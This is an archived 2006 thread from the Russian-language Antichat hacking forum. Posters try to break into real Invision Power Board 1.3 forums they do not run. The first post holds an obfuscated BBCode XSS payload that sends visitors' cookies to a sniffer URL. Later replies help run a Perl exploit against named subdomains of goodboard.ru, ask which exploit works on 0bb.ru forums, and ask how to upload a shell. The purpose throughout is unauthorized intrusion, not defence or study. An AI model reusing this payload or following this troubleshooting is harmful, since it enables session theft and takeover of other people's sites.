ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.08.2006, 16:18
|
|
Новичок
Регистрация: 08.08.2006
Сообщений: 14
Провел на форуме:
24267
Репутация:
1
|
|
 Я короче сглупил... Меня спутало - session_id в снифире, я пытался догнать как эту одну строку распихать по (member_id, pass_hash, forum_read)  Теперь я уже в курсе про сесии...
Ладно, к сути:
1.) Примеры с XSS прокатят только в IE?
2.) Я перепробовал все XSS примеры из темы - "Обзор уязвимостей Ipb", (хоть как-то)преобразовался только один (цвет я добавил от себя):
[color=#eef2f7]
[H*TML][E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL][/c*olor][c*olor=#eef2f7]` style=`background:url(javascript :document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
, но куки всёравно не отсылаються на снифер 
Посмотрел в код страницы:
<BR><SPAN style="COLOR: #eef2f7"><BR>[HTML]<A href="http://wj`=`/" target=_blank></A></SPAN><SPAN style="COLOR: #eef2f7">` style=`background:url(javascript :document.images 1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`</SPAN>
Походу нифига не преобразовалось...
Что делать?
qBiN в своей статье писал что это прокатывает в 9и из 10и форумов, неужели я попвл в 10ый?
З.Ы. Кстати на "моём" форуме есть только таки тэги:
[U*RL][I*MG][E*MAIL][Q*UOTE][C*ODE][L*IST][B*][I*][U*]
Форум - Invision Power Board(U) v1.3 Final
Может поможет чем...
Последний раз редактировалось oOLokiOo; 12.08.2006 в 16:20..
|
|
|
12.08.2006, 16:37
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Если ты видишь код в браузере, значит xss не работает. Без разницы какого цвета.
Ну звёздочки ты убрал разумеется?
Попробуй скульники лучше.
Ты не в 10 попал, просто времени много прошло.
|
|
|
|
12.08.2006, 17:52
|
|
Новичок
Регистрация: 08.08.2006
Сообщений: 14
Провел на форуме:
24267
Репутация:
1
|
|
Сообщение от Azazel
Если ты видишь код в браузере, значит xss не работает. Без разницы какого цвета.
Ясенько...
Но там ведь некоторые тэги попроподали... url вроде пропал...
Сообщение от Azazel
Ну звёздочки ты убрал разумеется?
Ну разумеется
Сообщение от Azazel
Попробуй скульники лучше.
Кого попробовать?
Сообщение от Azazel
Ты не в 10 попал, просто времени много прошло.
Жаль...
|
|
|
|
12.08.2006, 17:58
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Скульники - это sql инъекции. Это другой тип атаки. Удачи.
|
|
|
|
13.08.2006, 15:20
|
|
Новичок
Регистрация: 08.08.2006
Сообщений: 14
Провел на форуме:
24267
Репутация:
1
|
|
Вообщем поставил я себе Денвер2_ой, скачал эксплоит. И когда я его запускаю вот такие ошибки выдаёт:
loki2004.nm.ru/shot.GIF
Пробовал через батник:
---
start C:\WebServers\usr\bin\Perl.exe C:\ex.pl goodboard.ru /name_of_forum/ 1 0
---
Вообще 0 реакции... открыло консольку и моментом закрыло... Ставил "pause" смотрел, ничего вообще не выдаёт...
Шо за магия такая?...
З.Ы. Кстати я хоть в правильном месте писал имя форума? А то меня сбивает что он называеться не "forum" как в большинстве
случаев, а там идёт так - "http://SOME_NAME.goodboard.ru/"
З.Ы.Ы. За что отвечают последнее / 1 0? |
|
|
|
14.08.2006, 01:16
|
|
Познающий
Регистрация: 24.06.2005
Сообщений: 79
Провел на форуме:
227039
Репутация:
11
|
|
народ форумы
Invision Power Board(U) v1.3 Final
на 0bb.ru/
вообще уязвимы или там уже все дыры прикрыты
если да то какой сплойт юзать.. уже кучу всего перепробывал и безрезультатно
|
|
|
|
14.08.2006, 11:06
|
|
Новичок
Регистрация: 16.12.2005
Сообщений: 9
Провел на форуме:
80491
Репутация:
6
|
|
start C:\WebServers\usr\bin\Perl.exe C:\ex.pl goodboard.ru /name_of_forum/ 1 0
Помойму нада так:
start C:\WebServers\usr\bin\Perl.exe C:\ex.pl SOME_NAME.goodboard.ru / 1 0
1 и 0 Это помойму зависит от версии движка, для 1.х и для 2.х... Вроде так. Удачи.
Добавлено:
А вообще посмотрел несколько форумов, похоже там скульников нет
Последний раз редактировалось Lesha Lomalkin; 14.08.2006 в 11:16..
|
|
|
|
14.08.2006, 13:21
|
|
Познающий
Регистрация: 24.06.2005
Сообщений: 79
Провел на форуме:
227039
Репутация:
11
|
|
воопрос на не прощели просто в cmd указывать путь до эксплоита и команду..
али это только с актив_пером пашет
(ибо с денверовским перлом не проверял)
|
|
|
|
14.08.2006, 16:29
|
|
Новичок
Регистрация: 17.07.2006
Сообщений: 12
Провел на форуме:
107683
Репутация:
13
|
|
в стандартном денвере мало пакетов перловых. так что либо качай дополнительно Perl для денвера, либо ActivePerl. второй даже лучше, тк там есть ещё кроме всего прочего документация для перл.
|
|
|
|
22.08.2006, 22:19
|
|
Новичок
Регистрация: 04.04.2006
Сообщений: 21
Провел на форуме:
276851
Репутация:
1
|
|
как мне залить шелл на Ipb 1.3 через смайлы и скины не получается можна как нибудь по другому?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
